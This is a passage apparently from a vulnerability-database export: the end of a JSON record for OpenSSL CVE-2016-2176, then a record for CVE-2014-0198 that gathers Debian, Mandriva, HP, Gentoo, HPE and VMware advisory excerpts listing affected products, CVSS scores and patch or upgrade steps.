"http://www-01.ibm.com/support/docview.wss?uid=swg21984323" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21984483" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984794" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984920" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984977" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986123" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986313" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986460" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986506" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986563" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986564" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986669" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21987174" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987175" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987671" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988055" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988071" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988081" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988350" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988383" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988976" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21989958" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992493" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992894" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000192" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory20.asc" }, { "trust": 0.2, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.2, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.2, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.2, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-2176" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://github.com/tomwillfixit/alpine-cvecheck" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49332" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03756en_us" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2105" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2183" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2107" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2178" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2176" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7052" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6304" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6305" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2106" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2108" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-7052" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2109" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.1, "url": "http://eprint.iacr.org/2016/594.pdf" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2180" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2177" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6306" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03765en_us" }, { "trust": 0.1, "url": "http://h20565.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-a00006123en_" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0718" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4599" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4601" }, { "trust": 0.1, "url": "https://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4449" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4483" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4600" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1865" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4597" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4596" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4447" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1863" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4582" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4595" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1864" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9862" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4607" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4448" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4598" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1684" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4602" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht206900" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4594" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0169" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/releasestrat.html)," } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2176" }, { "db": "BID", "id": "89746" }, { "db": "JVNDB", "id": "JVNDB-2016-002477" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "136893" }, { "db": "PACKETSTORM", "id": "143513" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "169652" }, { "db": "CNNVD", "id": "CNNVD-201605-084" }, { "db": "NVD", "id": "CVE-2016-2176" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-2176" }, { "db": "BID", "id": "89746" }, { "db": "JVNDB", "id": "JVNDB-2016-002477" }, { "db": "PACKETSTORM", "id": "142803" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "136893" }, { "db": "PACKETSTORM", "id": "143513" }, { "db": "PACKETSTORM", "id": "137958" }, { "db": "PACKETSTORM", "id": "169652" }, { "db": "CNNVD", "id": "CNNVD-201605-084" }, { "db": "NVD", "id": "CVE-2016-2176" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-05-05T00:00:00", "db": "VULMON", "id": "CVE-2016-2176" }, { "date": "2016-05-03T00:00:00", "db": "BID", "id": "89746" }, { "date": "2016-05-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-002477" }, { "date": "2017-06-05T18:18:00", "db": "PACKETSTORM", "id": "142803" }, { "date": "2016-12-07T16:37:31", "db": "PACKETSTORM", "id": "140056" }, { "date": "2016-05-03T22:55:47", "db": "PACKETSTORM", "id": "136893" }, { "date": "2017-07-26T17:44:00", "db": "PACKETSTORM", "id": "143513" }, { "date": "2016-07-19T19:45:20", "db": "PACKETSTORM", "id": "137958" }, { "date": "2016-05-03T12:12:12", "db": "PACKETSTORM", "id": "169652" }, { "date": "2016-05-04T00:00:00", "db": "CNNVD", "id": "CNNVD-201605-084" }, { "date": "2016-05-05T01:59:06.340000", "db": "NVD", "id": "CVE-2016-2176" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-2176" }, { "date": "2017-05-02T01:10:00", "db": "BID", "id": "89746" }, { "date": "2017-10-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-002477" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201605-084" }, { "date": "2023-11-07T02:31:01.193000", "db": "NVD", "id": "CVE-2016-2176" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201605-084" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of crypto/x509/x509_obj.c of X509_NAME_oneline Vulnerability in function that can retrieve important information from process stack memory", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-002477" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201605-084" } ], "trust": 0.6 } }
var-201405-0244
Vulnerability from variot
The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a buffer pointer during certain recursive calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via vectors that trigger an alert condition. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in denial-of-service conditions.
The oldstable distribution (squeeze) is not affected.
For the stable distribution (wheezy), this problem has been fixed in version 1.0.1e-2+deb7u9.
For the testing distribution (jessie), this problem has been fixed in version 1.0.1g-4.
For the unstable distribution (sid), this problem has been fixed in version 1.0.1g-4.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198 http://advisories.mageia.org/MGASA-2014-0204.html
Updated Packages:
Mandriva Business Server 1/X86_64: 0960978623ce1a63b660860f11a273cd mbs1/x86_64/lib64openssl1.0.0-1.0.0k-1.3.mbs1.x86_64.rpm a1f2e8359b1823df2bbf4cef25ed0fa5 mbs1/x86_64/lib64openssl-devel-1.0.0k-1.3.mbs1.x86_64.rpm 9caf8ee1e9151cd22cc8bbbcec6ddc64 mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0k-1.3.mbs1.x86_64.rpm e7e8655dcdfcf3499b5d3280a7023beb mbs1/x86_64/lib64openssl-static-devel-1.0.0k-1.3.mbs1.x86_64.rpm 34ef39c4e07e20ed081ff466b744e6b1 mbs1/x86_64/openssl-1.0.0k-1.3.mbs1.x86_64.rpm 4c4315e35972686c692a095851d42cd4 mbs1/SRPMS/openssl-1.0.0k-1.3.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security.
HP Insight Control server deployment packages HP System Management Homepage (SMH) and HP Version Control Agent (VCA), and HP Smart Update Manager (SUM) and deploys them through the following components. This bulletin provides the information needed to update the HP Insight Control server deployment solution. HP has provided manual update steps if a version upgrade is not possible; if users wish to remain at v7.1.2, v7.2.0, or v7.2.1.
Note: It is important to check your current running version of HP Insight Control server deployment and to follow the correct steps listed below. For HP Insight Control server deployment v7.2.2, users must upgrade to v7.3.1 and follow the steps below to remove the vulnerability. That Security Bulletin with instructions on how to upgrade to v7.3.1 can be found here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n a-c04267749
HP Insight Control server deployment users of v7.1.2, v7.2.0, v7.2.1 should take the following steps to remove this vulnerability.
Delete the files smhamd64-.exe/smhx86-.exe" from Component Copy Location listed in the following table, rows 1 and 2. Delete the files "vcax86-.exe/vcaamd64-.exe from Component Copy Location listed in the following table, rows 3 and 4. Delete the files hpsmh-7.*.rpm" from Component Copy Location listed in row 5. In sequence, perform the steps from left to right in the following table. First, download components from Download Link; Second, rename the component as suggested in Rename to. Third, copy the component to the location specified in Component Copy Location. Table Row Number Download Link Rename to Component Copy Location
1 http://www.hp.com/swpublishing/MTX-e8076c2a35804685ad65b2b1ba smhamd64-ccp023716.exe \express\hpfeatures\hpagents-ws\components\Win2008
2 http://www.hp.com/swpublishing/MTX-3395d737d98f42149125b9bb05 smhx86-cp023715.exe \express\hpfeatures\hpagents-ws\components\Win2008
3 http://www.hp.com/swpublishing/MTX-8aefeaf490284a7691eca97d13 vcax86-cp023742.exe \express\hpfeatures\hpagents-ws\components\Win2008
4 http://www.hp.com/swpublishing/MTX-c0d32bac154a4d93839d8cd1f2 vcaamd64-cp023743.exe \express\hpfeatures\hpagents-ws\components\Win2008
5 http://www.hp.com/swpublishing/MTX-bd9a1cf60e344c549c4888db93 Do not rename the downloaded component for this step. \express\hpfeatures\hpagents-sles11-x64\components \express\hpfeatures\hpagents-sles10-x64\components \express\hpfeatures\hpagents-rhel5-x64\components \express\hpfeatures\hpagents-rhel6-x64\components
Download and extract the HPSUM 5.3.6 component from ftp://ftp.hp.com/pub/softlib2/software1/pubsw-windows/p750586112/v99793
Copy all content from extracted ZIP folder and paste into \eXpress\hpfeatures\fw-proLiant\components Initiate Install HP Management Agents for SLES 11 x64 on targets running SLES11 x64. Initiate Install HP Management Agents for SLES 10 x64 on targets running SLES10 x64. Initiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL 6 x64. Initiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL 5 x64. Initiate Install HP Management Agents for Windows x86/x64 on targets running Windows.
HP Insight Control server deployment users with v7.2.2:
Please upgrade to Insight Control server deployment v7.3.1 and follow the steps below for v7.3.1.
HP Insight Control server deployment users with v7.3.1:
Perform steps 1 - 4 as outlined above for users with HP Insight Control server deployment v7.1.2, v7.2.0, and v7.2.1. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201407-05
http://security.gentoo.org/
Severity: High Title: OpenSSL: Multiple vulnerabilities Date: July 27, 2014 Bugs: #512506 ID: 201407-05
Synopsis
Multiple vulnerabilities have been found in OpenSSL, possibly allowing remote attackers to execute arbitrary code.
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.1h-r1"
References
[ 1 ] CVE-2010-5298 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5298 [ 2 ] CVE-2014-0195 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0195 [ 3 ] CVE-2014-0198 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0198 [ 4 ] CVE-2014-0221 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0221 [ 5 ] CVE-2014-0224 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0224 [ 6 ] CVE-2014-3470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3470 [ 7 ] OpenSSL Security Advisory [05 Jun 2014] http://www.openssl.org/news/secadv_20140605.txt
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201407-05.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . These vulnerabilities include:
-
The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "POODLE", which could be exploited remotely resulting in disclosure of information.
-
HP StoreVirtual VSA Software 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 China Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 600GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2010-5298
4.8 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L
4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CVE-2014-0076
4.0 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1.9 (AV:L/AC:M/Au:N/C:P/I:N/A:N)
CVE-2014-0195
7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-0198
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CVE-2014-0221
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CVE-2014-0224
6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-3470
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CVE-2014-3566
3.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CVE-2016-0705
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE recommends applying the following software updates to resolve the vulnerabilities in the impacted versions of HPE StoreVirtual products running HPE LeftHand OS.
LeftHand OS v11.5 - Patches 45019-00 and 45020 LeftHand OS v12.0 - Patches 50016-00 and 50017-00 LeftHand OS v12.5 - Patch 55016-00 LeftHand OS v12.6 - Patch 56002-00
Notes:
These patches enable TLSv1.2 protocol and upgrades the OpenSSL RPM revision to OpenSSL v1.0.1e 48. These patches migrate Certificate Authority Hashing Algorithm from a weak hashing algorithm SHA1 to the stronger hashing algorithm SHA256. Summary
VMware product updates address OpenSSL security vulnerabilities.
- Relevant Releases
ESXi 5.5 prior to ESXi550-201406401-SG
-
OpenSSL libraries have been updated in multiple products to versions 0.9.8za and 1.0.1h in order to resolve multiple security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2014-0224, CVE-2014-0198, CVE-2010-5298, CVE-2014-3470, CVE-2014-0221 and CVE-2014-0195 to these issues. The most important of these issues is CVE-2014-0224.
CVE-2014-0198, CVE-2010-5298 and CVE-2014-3470 are considered to be of moderate severity. Exploitation is highly unlikely or is mitigated due to the application configuration.
CVE-2014-0221 and CVE-2014-0195, which are listed in the OpenSSL Security Advisory (see Reference section below), do not affect any VMware products. For readability the affected products have been split into 3 tables below, based on the different client-server configurations and deployment scenarios. Applying these patches to affected servers will mitigate the affected clients (See Table 1 below). can be mitigated by using a secure network such as VPN (see Table 2 below).
Clients and servers that are deployed on an isolated network are less exposed to CVE-2014-0224 (see Table 3 below). The affected products are typically deployed to communicate over the management network.
RECOMMENDATIONS
VMware recommends customers evaluate and deploy patches for affected Servers in Table 1 below as these patches become available. Patching these servers will remove the ability to exploit the vulnerability described in CVE-2014-0224 on both clients and servers. VMware recommends customers consider applying patches to products listed in Table 2 & 3 as required.
Column 4 of the following tables lists the action required to remediate the vulnerability in each release, if a solution is available.
VMware Product Running Replace with/ Product Version on Apply Patch ============== ======= ======= ============= ESXi 5.5 ESXi ESXi550- 201406401-SG
Big Data Extensions 1.1 patch pending Charge Back Manager 2.6 patch pending
Horizon Workspace Server GATEWAY 1.8.1 patch pending Horizon Workspace Server GATEWAY 1.5 patch pending
Horizon Workspace Server DATA 1.8.1 patch pending
Horizon Mirage Edge Gateway 4.4.2 patch pending Horizon View 5.3.1 patch pending
Horizon View Feature Pack 5.3 SP2 patch pending
NSX for Multi-Hypervisor 4.1.2 patch pending NSX for Multi-Hypervisor 4.0.3 patch pending NSX for vSphere 6.0.4 patch pending NVP 3.2.2 patch pending vCAC 6.0.1 patch pending
vCloud Networking and Security 5.5.2 patch pending vCloud Networking and Security 5.1.2 patch pending
vFabric Web Server 5.3.4 patch pending
vCHS - DPS-Data Protection 2.0 patch pending Service
Table 2 ======== Affected clients running a vulnerable version of OpenSSL 0.9.8 or 1.0.1 and communicating over an untrusted network.
VMware Product Running Replace with/ Product Version on Apply Patch ============== ======= ======= ============= vCSA 5.5 patch pending vCSA 5.1 patch pending vCSA 5.0 patch pending
ESXi 5.1 ESXi patch pending ESXi 5.0 ESXi patch pending
Workstation 10.0.2 any patch pending Workstation 9.0.3 any patch pending Fusion 6.x OSX patch pending Fusion 5.x OSX patch pending Player 10.0.2 any patch pending Player 9.0.3 any patch pending
Chargeback Manager 2.5.x patch pending
Horizon Workspace Client for 1.8.1 OSX patch pending Mac Horizon Workspace Client for 1.5 OSX patch pending Mac Horizon Workspace Client for 1.8.1 Windows patch pending Windows
Horizon Workspace Client for 1.5 Windows patch pendingOVF Tool 3.5.1 patch pending OVF Tool 3.0.1 patch pending
vCenter Operations Manager 5.8.1 patch pending
vCenter Support Assistant 5.5.0 patch pending vCenter Support Assistant 5.5.1 patch pending
vCD 5.1.2 patch pending
